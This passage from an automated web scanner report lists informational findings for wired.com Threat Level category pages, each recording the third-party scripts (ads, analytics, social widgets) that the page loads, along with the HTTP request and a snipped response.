Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
Last-Modified: Wed, 12 Jan 2011 14:17:06 +0000
Content-Type: text/html;charset=UTF-8
Cache-Control: must-revalidate, max-age=121
Expires: Wed, 12 Jan 2011 15:33:30 GMT
Date: Wed, 12 Jan 2011 15:31:29 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 77580

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...

<script type="text/javascript" src="http://lite.piclens.com/current/piclens_optimized.js"></script>
...[SNIP]...
<br />
<script src="http://digg.com/tools/diggthis.js" type="text/javascript"></script>
...[SNIP]...
</div>
<script src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
<div class="textwidget"><script type="text/javascript" src="http://widgets.amung.us/classic.js"></script>
...[SNIP]...

<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...

6.122. http://www.wired.com/threatlevel/category/spooks-gone-wild/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wired.com
Path:	/threatlevel/category/spooks-gone-wild/

Issue detail

The response dynamically includes the following scripts from other domains:

http://digg.com/tools/diggthis.js
http://lite.piclens.com/current/piclens_optimized.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php
http://widgets.amung.us/classic.js
http://www.google-analytics.com/urchin.js

Request

GET /threatlevel/category/spooks-gone-wild/ HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
Last-Modified: Wed, 12 Jan 2011 14:17:40 +0000
Content-Type: text/html;charset=UTF-8
Cache-Control: must-revalidate, max-age=99
Expires: Wed, 12 Jan 2011 15:33:10 GMT
Date: Wed, 12 Jan 2011 15:31:31 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 138433

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...

<script type="text/javascript" src="http://lite.piclens.com/current/piclens_optimized.js"></script>
...[SNIP]...
<br />
<script src="http://digg.com/tools/diggthis.js" type="text/javascript"></script>
...[SNIP]...
<br />
<script src="http://digg.com/tools/diggthis.js" type="text/javascript"></script>
...[SNIP]...
</div>
<script src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
<div class="textwidget"><script type="text/javascript" src="http://widgets.amung.us/classic.js"></script>
...[SNIP]...

<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...

6.123. http://www.wired.com/threatlevel/category/stuxnet/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wired.com
Path:	/threatlevel/category/stuxnet/

Issue detail

The response dynamically includes the following scripts from other domains:

http://lite.piclens.com/current/piclens_optimized.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php
http://widgets.amung.us/classic.js
http://www.google-analytics.com/urchin.js

Request

GET /threatlevel/category/stuxnet/ HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
Last-Modified: Wed, 12 Jan 2011 14:18:41 +0000
Content-Type: text/html;charset=UTF-8
Cache-Control: must-revalidate, max-age=166
Expires: Wed, 12 Jan 2011 15:34:24 GMT
Date: Wed, 12 Jan 2011 15:31:38 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 70092

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...

<script type="text/javascript" src="http://lite.piclens.com/current/piclens_optimized.js"></script>
...[SNIP]...
</div>
<script src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
<div class="textwidget"><script type="text/javascript" src="http://widgets.amung.us/classic.js"></script>
...[SNIP]...

<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...

6.124. http://www.wired.com/threatlevel/category/sunshine-and-secrecy/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wired.com
Path:	/threatlevel/category/sunshine-and-secrecy/

Issue detail

The response dynamically includes the following scripts from other domains:

http://lite.piclens.com/current/piclens_optimized.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php
http://widgets.amung.us/classic.js
http://www.google-analytics.com/urchin.js

Request

GET /threatlevel/category/sunshine-and-secrecy/ HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
Last-Modified: Wed, 12 Jan 2011 14:18:53 +0000
Content-Type: text/html;charset=UTF-8
Cache-Control: must-revalidate, max-age=93
Expires: Wed, 12 Jan 2011 15:33:18 GMT
Date: Wed, 12 Jan 2011 15:31:45 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 120027

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...

<script type="text/javascript" src="http://lite.piclens.com/current/piclens_optimized.js"></script>
...[SNIP]...
</div>
<script src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
<div class="textwidget"><script type="text/javascript" src="http://widgets.amung.us/classic.js"></script>
...[SNIP]...

<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...

6.125. http://www.wired.com/threatlevel/category/surveillance/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wired.com
Path:	/threatlevel/category/surveillance/

Issue detail

The response dynamically includes the following scripts from other domains:

http://lite.piclens.com/current/piclens_optimized.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php
http://widgets.amung.us/classic.js
http://www.google-analytics.com/urchin.js

Request

GET /threatlevel/category/surveillance/ HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
Last-Modified: Wed, 12 Jan 2011 14:19:05 +0000
Content-Type: text/html;charset=UTF-8
Cache-Control: must-revalidate, max-age=123
Expires: Wed, 12 Jan 2011 15:33:51 GMT
Date: Wed, 12 Jan 2011 15:31:48 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 116610

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...

<script type="text/javascript" src="http://lite.piclens.com/current/piclens_optimized.js"></script>
...[SNIP]...
</div>
<script src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
<div class="textwidget"><script type="text/javascript" src="http://widgets.amung.us/classic.js"></script>
...[SNIP]...

<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...

6.126. http://www.wired.com/threatlevel/category/the-courts/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wired.com
Path:	/threatlevel/category/the-courts/

Issue detail

The response dynamically includes the following scripts from other domains:

http://lite.piclens.com/current/piclens_optimized.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php
http://widgets.amung.us/classic.js
http://www.google-analytics.com/urchin.js

Request

GET /threatlevel/category/the-courts/ HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
Last-Modified: Wed, 12 Jan 2011 14:19:52 +0000
Content-Type: text/html;charset=UTF-8
Cache-Control: must-revalidate, max-age=113
Expires: Wed, 12 Jan 2011 15:33:42 GMT
Date: Wed, 12 Jan 2011 15:31:49 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 116691

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...

<script type="text/javascript" src="http://lite.piclens.com/current/piclens_optimized.js"></script>
...[SNIP]...
</div>
<script src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
<div class="textwidget"><script type="text/javascript" src="http://widgets.amung.us/classic.js"></script>
...[SNIP]...

<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...

6.127. http://www.wired.com/threatlevel/category/the-ridiculous/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wired.com
Path:	/threatlevel/category/the-ridiculous/

Issue detail

The response dynamically includes the following scripts from other domains:

http://lite.piclens.com/current/piclens_optimized.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php
http://widgets.amung.us/classic.js
http://www.google-analytics.com/urchin.js

Request

GET /threatlevel/category/the-ridiculous/ HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
Last-Modified: Wed, 12 Jan 2011 14:20:02 +0000
Content-Type: text/html;charset=UTF-8
Cache-Control: must-revalidate, max-age=142
Expires: Wed, 12 Jan 2011 15:34:14 GMT
Date: Wed, 12 Jan 2011 15:31:52 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 116182

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...

<script type="text/javascript" src="http://lite.piclens.com/current/piclens_optimized.js"></script>
...[SNIP]...
</div>
<script src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
<div class="textwidget"><script type="text/javascript" src="http://widgets.amung.us/classic.js"></script>
...[SNIP]...

<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...

6.128. http://www.wired.com/threatlevel/category/threats/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wired.com
Path:	/threatlevel/category/threats/

Issue detail

The response dynamically includes the following scripts from other domains:

http://lite.piclens.com/current/piclens_optimized.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php
http://widgets.amung.us/classic.js
http://www.google-analytics.com/urchin.js

Request

GET /threatlevel/category/threats/ HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
Last-Modified: Wed, 12 Jan 2011 14:20:12 +0000
Content-Type: text/html;charset=UTF-8
Cache-Control: must-revalidate, max-age=145
Expires: Wed, 12 Jan 2011 15:34:26 GMT
Date: Wed, 12 Jan 2011 15:32:01 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 117270

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...

<script type="text/javascript" src="http://lite.piclens.com/current/piclens_optimized.js"></script>
...[SNIP]...
</div>
<script src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
<div class="textwidget"><script type="text/javascript" src="http://widgets.amung.us/classic.js"></script>
...[SNIP]...

<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...

6.129. http://www.wired.com/threatlevel/category/three-strikes/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wired.com
Path:	/threatlevel/category/three-strikes/

Issue detail

The response dynamically includes the following scripts from other domains:

http://digg.com/tools/diggthis.js
http://lite.piclens.com/current/piclens_optimized.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php
http://widgets.amung.us/classic.js
http://www.google-analytics.com/urchin.js

Request

GET /threatlevel/category/three-strikes/ HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
Last-Modified: Wed, 12 Jan 2011 14:20:20 +0000
Content-Type: text/html;charset=UTF-8
Cache-Control: must-revalidate, max-age=87
Expires: Wed, 12 Jan 2011 15:33:30 GMT
Date: Wed, 12 Jan 2011 15:32:03 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 82575

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...

<script type="text/javascript" src="http://lite.piclens.com/current/piclens_optimized.js"></script>
...[SNIP]...
<br />
<script src="http://digg.com/tools/diggthis.js" type="text/javascript"></script>
...[SNIP]...
</div>
<script src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
<div class="textwidget"><script type="text/javascript" src="http://widgets.amung.us/classic.js"></script>
...[SNIP]...

<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...

6.130. http://www.wired.com/threatlevel/category/tsa/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wired.com
Path:	/threatlevel/category/tsa/

Issue detail

The response dynamically includes the following scripts from other domains:

http://lite.piclens.com/current/piclens_optimized.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php
http://widgets.amung.us/classic.js
http://www.google-analytics.com/urchin.js

Request

GET /threatlevel/category/tsa/ HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
Last-Modified: Wed, 12 Jan 2011 14:20:38 +0000
Content-Type: text/html;charset=UTF-8
Cache-Control: must-revalidate, max-age=107
Expires: Wed, 12 Jan 2011 15:33:55 GMT
Date: Wed, 12 Jan 2011 15:32:08 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 63575

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...

<script type="text/javascript" src="http://lite.piclens.com/current/piclens_optimized.js"></script>
...[SNIP]...
</div>
<script src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
<div class="textwidget"><script type="text/javascript" src="http://widgets.amung.us/classic.js"></script>
...[SNIP]...

<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...

6.131. http://www.wired.com/threatlevel/category/uncategorized/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wired.com
Path:	/threatlevel/category/uncategorized/

Issue detail

The response dynamically includes the following scripts from other domains:

http://lite.piclens.com/current/piclens_optimized.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php
http://widgets.amung.us/classic.js
http://www.google-analytics.com/urchin.js

Request

GET /threatlevel/category/uncategorized/ HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
Last-Modified: Wed, 12 Jan 2011 14:14:20 +0000
Content-Type: text/html;charset=UTF-8
Cache-Control: must-revalidate, max-age=225
Expires: Wed, 12 Jan 2011 15:34:19 GMT
Date: Wed, 12 Jan 2011 15:30:34 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 117261

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...

<script type="text/javascript" src="http://lite.piclens.com/current/piclens_optimized.js"></script>
...[SNIP]...
</div>
<script src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
<div class="textwidget"><script type="text/javascript" src="http://widgets.amung.us/classic.js"></script>
...[SNIP]...

<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...

6.132. http://www.wired.com/threatlevel/category/watchlists/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wired.com
Path:	/threatlevel/category/watchlists/

Issue detail

The response dynamically includes the following scripts from other domains:

http://lite.piclens.com/current/piclens_optimized.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php
http://widgets.amung.us/classic.js
http://www.google-analytics.com/urchin.js

Request

GET /threatlevel/category/watchlists/ HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
Last-Modified: Wed, 12 Jan 2011 14:20:46 +0000
Content-Type: text/html;charset=UTF-8
Cache-Control: must-revalidate, max-age=52
Expires: Wed, 12 Jan 2011 15:33:09 GMT
Date: Wed, 12 Jan 2011 15:32:17 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 124936

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...

<script type="text/javascript" src="http://lite.piclens.com/current/piclens_optimized.js"></script>
...[SNIP]...
</div>
<script src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
<div class="textwidget"><script type="text/javascript" src="http://widgets.amung.us/classic.js"></script>
...[SNIP]...

<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...

6.133. http://www.wired.com/threatlevel/category/wikileaks/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wired.com
Path:	/threatlevel/category/wikileaks/

Issue detail

The response dynamically includes the following scripts from other domains:

http://lite.piclens.com/current/piclens_optimized.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php
http://widgets.amung.us/classic.js
http://www.google-analytics.com/urchin.js

Request

GET /threatlevel/category/wikileaks/ HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
Last-Modified: Wed, 12 Jan 2011 12:49:59 +0000
Content-Type: text/html;charset=UTF-8
Cache-Control: must-revalidate, max-age=304
Expires: Wed, 12 Jan 2011 15:33:17 GMT
Date: Wed, 12 Jan 2011 15:28:13 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 122533

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...

<script type="text/javascript" src="http://lite.piclens.com/current/piclens_optimized.js"></script>
...[SNIP]...
</div>
<script src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
<div class="textwidget"><script type="text/javascript" src="http://widgets.amung.us/classic.js"></script>
...[SNIP]...

<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...

6.134. http://www.wired.com/threatlevel/category/yo-ho-ho/ previous next

Summary

Severity:	Information
Confidence:	Certain
